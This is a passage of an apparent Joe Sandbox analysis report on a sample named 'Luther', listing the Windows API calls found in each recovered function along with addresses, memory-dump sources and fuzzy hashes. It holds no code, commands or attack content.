                                                                                                          • GetWindowThreadProcessId.USER32(?,?), ref: 00E9F46C
                                                                                                          • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E9F47B
                                                                                                          • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E9F485
                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E9F48C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 839392675-0
                                                                                                          • Opcode ID: 27771f6e354f0b1388f73446f027906429fdc846b8d222386c85056e7b0be128
                                                                                                          • Instruction ID: ec0f3cd6f5948f354ced94b5d0eedc77a3446df46a86b995cdaae601bc71884e
                                                                                                          • Opcode Fuzzy Hash: 27771f6e354f0b1388f73446f027906429fdc846b8d222386c85056e7b0be128
                                                                                                          • Instruction Fuzzy Hash: E1F06772205158BFE7205B639C0EEEF7A7CEBC6B11F000038F601E1090A6A22A06C6B5
                                                                                                          APIs
                                                                                                          • GetClientRect.USER32(?), ref: 00E734EF
                                                                                                          • SendMessageW.USER32(?,00001328,00000000,?), ref: 00E73506
                                                                                                          • GetWindowDC.USER32(?), ref: 00E73512
                                                                                                          • GetPixel.GDI32(00000000,?,?), ref: 00E73521
                                                                                                          • ReleaseDC.USER32(?,00000000), ref: 00E73533
                                                                                                          • GetSysColor.USER32(00000005), ref: 00E7354D
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 272304278-0
                                                                                                          • Opcode ID: d570ab063a46b1fb1e3052bcbc51ecc877ae963476e1444afe054d7daa776606
                                                                                                          • Instruction ID: 38b85a8f1e20e552ff716c8a1a25358bda1ac3ebbf6564be33e593eeb703e3f5
                                                                                                          • Opcode Fuzzy Hash: d570ab063a46b1fb1e3052bcbc51ecc877ae963476e1444afe054d7daa776606
                                                                                                          • Instruction Fuzzy Hash: 66012431504205EFDB915BA5DC08FEABBB2FB08321F504174FA1AB21A0CB331E56EB10
                                                                                                          APIs
                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00E921CC
                                                                                                          • UnloadUserProfile.USERENV(?,?), ref: 00E921D8
                                                                                                          • CloseHandle.KERNEL32(?), ref: 00E921E1
                                                                                                          • CloseHandle.KERNEL32(?), ref: 00E921E9
                                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00E921F2
                                                                                                          • HeapFree.KERNEL32(00000000), ref: 00E921F9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                          • String ID:
                                                                                                          • API String ID: 146765662-0
                                                                                                          • Opcode ID: 3bbde99bf674452541edb19448dffcf79205831c05e6749dc6eb25b76f89b114
                                                                                                          • Instruction ID: 346653c7f8d5b9b5a7ed3f36145a0284ef7e48a3abb7fd48c75b5a970064fb82
                                                                                                          • Opcode Fuzzy Hash: 3bbde99bf674452541edb19448dffcf79205831c05e6749dc6eb25b76f89b114
                                                                                                          • Instruction Fuzzy Hash: 3AE0C2B6008505BFDB011BA6EC0CD0ABF29FB49322B144235F225E2070CB339426DB50
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E341EA: _wcslen.LIBCMT ref: 00E341EF
                                                                                                          • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00E9CF99
                                                                                                          • _wcslen.LIBCMT ref: 00E9CFE0
                                                                                                          • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00E9D047
                                                                                                          • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00E9D075
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ItemMenu$Info_wcslen$Default
                                                                                                          • String ID: 0
                                                                                                          • API String ID: 1227352736-4108050209
                                                                                                          • Opcode ID: b23dc734ba0f4174018a5c48be943eef9730ecf2caa2ffb194c9f8bf704d1ee9
                                                                                                          • Instruction ID: 0015e405c4c22bcecd8947f31eb5f1251e813b0aecbd17f21dc322a2bdc0f5e9
                                                                                                          • Opcode Fuzzy Hash: b23dc734ba0f4174018a5c48be943eef9730ecf2caa2ffb194c9f8bf704d1ee9
                                                                                                          • Instruction Fuzzy Hash: 80510171608310ABDB10AF28CC48BABBBE9AF45318F042A2DF991F31D1DB70C905C752
                                                                                                          APIs
                                                                                                          • ShellExecuteExW.SHELL32(0000003C), ref: 00EBB903
                                                                                                            • Part of subcall function 00E341EA: _wcslen.LIBCMT ref: 00E341EF
                                                                                                          • GetProcessId.KERNEL32(00000000), ref: 00EBB998
                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00EBB9C7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseExecuteHandleProcessShell_wcslen
                                                                                                          • String ID: <$@
                                                                                                          • API String ID: 146682121-1426351568
                                                                                                          • Opcode ID: ca503d6479eda1e8993e8ca07451453131d70a23fffb93dfea4ba4fb7cb817ae
                                                                                                          • Instruction ID: 2acdb78c4e59df183ce94b1c522fd55401ec323fb81a80126ffab45741b05cc3
                                                                                                          • Opcode Fuzzy Hash: ca503d6479eda1e8993e8ca07451453131d70a23fffb93dfea4ba4fb7cb817ae
                                                                                                          • Instruction Fuzzy Hash: 16715574A00615DFCB14EF55C884A9EBBF4EF08304F0494A9E856BB292CBB5ED45CB90
                                                                                                          APIs
                                                                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00EC48D1
                                                                                                          • IsMenu.USER32(?), ref: 00EC48E6
                                                                                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00EC492E
                                                                                                          • DrawMenuBar.USER32 ref: 00EC4941
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Menu$Item$DrawInfoInsert
                                                                                                          • String ID: 0
                                                                                                          • API String ID: 3076010158-4108050209
                                                                                                          • Opcode ID: 18483c1eb12b1d1af2c1fc781c275aeb7cd04e9d0e5e72030a8049ae88ae39c7
                                                                                                          • Instruction ID: 8c452e71056683e6d2b78baec7151c922de19e44e664cf537be0707424f3605e
                                                                                                          • Opcode Fuzzy Hash: 18483c1eb12b1d1af2c1fc781c275aeb7cd04e9d0e5e72030a8049ae88ae39c7
                                                                                                          • Instruction Fuzzy Hash: B9416AB5A0025AEFDB10CF51D994EAABBB5FF46328F04502DFD45A7290C332AD46DB60
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E3B329: _wcslen.LIBCMT ref: 00E3B333
                                                                                                            • Part of subcall function 00E945FD: GetClassNameW.USER32(?,?,000000FF), ref: 00E94620
                                                                                                          • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00E927B3
                                                                                                          • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00E927C6
                                                                                                          • SendMessageW.USER32(?,00000189,?,00000000), ref: 00E927F6
                                                                                                            • Part of subcall function 00E38577: _wcslen.LIBCMT ref: 00E3858A
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$_wcslen$ClassName
                                                                                                          • String ID: ComboBox$ListBox
                                                                                                          • API String ID: 2081771294-1403004172
                                                                                                          • Opcode ID: 9c3d1ccf00d17d2d7df1cc6448915c838d6a4075175f63d1109fa7851db5a0c1
                                                                                                          • Instruction ID: a94bdea0ac4846a14a2dac20d21b3ff71fb471a7eda9eefb3e5126dc3f31d355
                                                                                                          • Opcode Fuzzy Hash: 9c3d1ccf00d17d2d7df1cc6448915c838d6a4075175f63d1109fa7851db5a0c1
                                                                                                          • Instruction Fuzzy Hash: 7C21B471900104BFDF19ABA4DC49DFEBBB8DF453A4F10612AF912B71E1CB75490ADA50
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00EC3A29
                                                                                                          • LoadLibraryW.KERNEL32(?), ref: 00EC3A30
                                                                                                          • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00EC3A45
                                                                                                          • DestroyWindow.USER32(?), ref: 00EC3A4D
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                                                          • String ID: SysAnimate32
                                                                                                          • API String ID: 3529120543-1011021900
                                                                                                          • Opcode ID: 3fe25ff5e07e1a99479449641f6ffd23fe0b2d58b5d7c9f16a50ee361e547567
                                                                                                          • Instruction ID: 63087839610b5cfe504dfc7effe0a5d6b7bb88d8443c08833709476566240cae
                                                                                                          • Opcode Fuzzy Hash: 3fe25ff5e07e1a99479449641f6ffd23fe0b2d58b5d7c9f16a50ee361e547567
                                                                                                          • Instruction Fuzzy Hash: 21219F71600609AFEB109F74DD84FBB77E9EB85368F10A229FA91A2190C772CD529760
                                                                                                          APIs
                                                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00E5508E,?,?,00E5502E,?,00EF98D8,0000000C,00E55185,?,00000002), ref: 00E550FD
                                                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00E55110
                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,00E5508E,?,?,00E5502E,?,00EF98D8,0000000C,00E55185,?,00000002,00000000), ref: 00E55133
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                                          • API String ID: 4061214504-1276376045
                                                                                                          • Opcode ID: d135dc4f60faf728076c1c10f82def990b41e9668c9f19446470be10ff76b5a4
                                                                                                          • Instruction ID: 5e7b6a311c756af5e9d19e057929359d9681faf62e6b0763030c1d8c3b493476
                                                                                                          • Opcode Fuzzy Hash: d135dc4f60faf728076c1c10f82def990b41e9668c9f19446470be10ff76b5a4
                                                                                                          • Instruction Fuzzy Hash: 1FF0A431A05608BFDB105F95DC09FADBFB5EF04716F040075F809B2160CB325949CB90
                                                                                                          APIs
                                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00E3668B,?,?,00E362FA,?,00000001,?,?,00000000), ref: 00E3664A
                                                                                                          • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00E3665C
                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,00E3668B,?,?,00E362FA,?,00000001,?,?,00000000), ref: 00E3666E
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Library$AddressFreeLoadProc
                                                                                                          • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                          • API String ID: 145871493-3689287502
                                                                                                          • Opcode ID: 80900435b05839431cd6ae0e8d1ff80be947fde71432cbf0db201b9ba6825c1b
                                                                                                          • Instruction ID: 2f35a66ac59adfd7f21292aff185765927a31285da7554438b9b89cd985cd0d1
                                                                                                          • Opcode Fuzzy Hash: 80900435b05839431cd6ae0e8d1ff80be947fde71432cbf0db201b9ba6825c1b
                                                                                                          • Instruction Fuzzy Hash: D4E086356066222B92112736BC0DF6AA9289F82B56F095135F905F2140DB53CD07C0B4
                                                                                                          APIs
                                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00E75657,?,?,00E362FA,?,00000001,?,?,00000000), ref: 00E36610
                                                                                                          • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00E36622
                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,00E75657,?,?,00E362FA,?,00000001,?,?,00000000), ref: 00E36635
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Library$AddressFreeLoadProc
                                                                                                          • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                          • API String ID: 145871493-1355242751
                                                                                                          • Opcode ID: b811f7b7a10f114e6021f93dfeb397ff419e290fa552740a72bc8f70a0b159be
                                                                                                          • Instruction ID: d3ec55371dfdb83d2200acc7474a5e4be0541e685bd051706b415c22db4f179d
                                                                                                          • Opcode Fuzzy Hash: b811f7b7a10f114e6021f93dfeb397ff419e290fa552740a72bc8f70a0b159be
                                                                                                          • Instruction Fuzzy Hash: 4CD01235617A316B422227366C1DEDFAE249F91B553195039B904B2174CF63CD17C5D8
                                                                                                          APIs
                                                                                                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00EA35C4
                                                                                                          • DeleteFileW.KERNEL32(?), ref: 00EA3646
                                                                                                          • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00EA365C
                                                                                                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00EA366D
                                                                                                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00EA367F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: File$Delete$Copy
                                                                                                          • String ID:
                                                                                                          • API String ID: 3226157194-0
                                                                                                          • Opcode ID: ced6211b38d86543e3f5195118871eca8a0e29217bf0116ab7a49aa16992e569
                                                                                                          • Instruction ID: 0ece32719275be25095e162a903e002126712ca611215cec8b1f7afeaa3c35b1
                                                                                                          • Opcode Fuzzy Hash: ced6211b38d86543e3f5195118871eca8a0e29217bf0116ab7a49aa16992e569
                                                                                                          • Instruction Fuzzy Hash: 18B17E72E00119AFDF15DBA4CC85EDEBBBDEF49314F0054A6F609BA151EA30AB44CB61
                                                                                                          APIs
                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 00EBAE87
                                                                                                          • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00EBAE95
                                                                                                          • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00EBAEC8
                                                                                                          • CloseHandle.KERNEL32(?), ref: 00EBB09D
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                          • String ID:
                                                                                                          • API String ID: 3488606520-0
                                                                                                          • Opcode ID: 582a02a469e9c2b73653379d5b246b01ccafea80236a876d6ed898b4004af9e7
                                                                                                          • Instruction ID: 88d5f2fec6c49445dc436eca779514205f23c744068c62a27c94468aea58deef
                                                                                                          • Opcode Fuzzy Hash: 582a02a469e9c2b73653379d5b246b01ccafea80236a876d6ed898b4004af9e7
                                                                                                          • Instruction Fuzzy Hash: 44A19FB1A043019FE720DF24C886B6AB7E5AF44714F14986CF5A9AB3D2C7B1EC41CB81
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E3B329: _wcslen.LIBCMT ref: 00E3B333
                                                                                                            • Part of subcall function 00EBD3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00EBC10E,?,?), ref: 00EBD415
                                                                                                            • Part of subcall function 00EBD3F8: _wcslen.LIBCMT ref: 00EBD451
                                                                                                            • Part of subcall function 00EBD3F8: _wcslen.LIBCMT ref: 00EBD4C8
                                                                                                            • Part of subcall function 00EBD3F8: _wcslen.LIBCMT ref: 00EBD4FE
                                                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00EBC505
                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00EBC560
                                                                                                          • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00EBC5C3
                                                                                                          • RegCloseKey.ADVAPI32(?,?), ref: 00EBC606
                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00EBC613
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                                          • String ID:
                                                                                                          • API String ID: 826366716-0
                                                                                                          • Opcode ID: 4c58b2ac475481f42d1e818f3adc4cfdc5461ccc69d637daa2241a0a0ddfe72c
                                                                                                          • Instruction ID: 280612d9b685928b559e79f53890b633639a00374fd8ebb7938f5ca809205690
                                                                                                          • Opcode Fuzzy Hash: 4c58b2ac475481f42d1e818f3adc4cfdc5461ccc69d637daa2241a0a0ddfe72c
                                                                                                          • Instruction Fuzzy Hash: B761B631209241AFC714DF14C895EA7BBE5FF84308F54A56CF09A6B292DB31ED46CB91
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E9E6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00E9D7CD,?), ref: 00E9E714
                                                                                                            • Part of subcall function 00E9E6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00E9D7CD,?), ref: 00E9E72D
                                                                                                            • Part of subcall function 00E9EAB0: GetFileAttributesW.KERNEL32(?,00E9D840), ref: 00E9EAB1
                                                                                                          • lstrcmpiW.KERNEL32(?,?), ref: 00E9ED8A
                                                                                                          • MoveFileW.KERNEL32(?,?), ref: 00E9EDC3
                                                                                                          • _wcslen.LIBCMT ref: 00E9EF02
                                                                                                          • _wcslen.LIBCMT ref: 00E9EF1A
